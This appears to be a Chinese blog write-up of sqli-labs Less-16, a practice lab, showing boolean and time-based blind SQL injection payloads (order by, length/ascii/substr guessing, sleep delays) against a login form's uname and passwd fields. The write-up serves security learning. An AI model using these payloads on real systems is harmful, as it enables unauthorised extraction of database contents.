sqli-labs靶场Less-16

1、访问首页,/Less-16/index.php,这里的传参点是表单中的uname、passwd

  1. 判断是否是数字形传参
  2. 判断是否有单引号闭合
  3. 判断是否是双引号闭合
  4. 判断是否单引号+括号闭合
  5. 判断是否是双引号+括号闭合

        如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入 

2、 判断字段数

admin") order by 2-- qwe

3、判断数据库长度

-- 盲注
admin") and length(database())=8-- qwe

-- 延时盲注
admin") and if(length(database())=8,sleep(10),0)-- qwe

4、猜解数据库名称,这里就只猜一位演示,数据库名:security

-- 盲注
admin") and ascii(substr(database(),1,1))=115-- qwe

-- 延时盲注
admin") and if(ascii(substr(database(),1,1))=115,sleep(10),0)-- qwe

5、猜解表名长度

-- 盲注
admin") and length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5-- qwe

-- 延时盲注
admin") and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(10),0)-- qwe

6、猜解表的第一位,后面4位同样的道理,表名:users 

-- 盲注
admin") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117-- qwe

-- 延时盲注
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),0)-- qwe

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值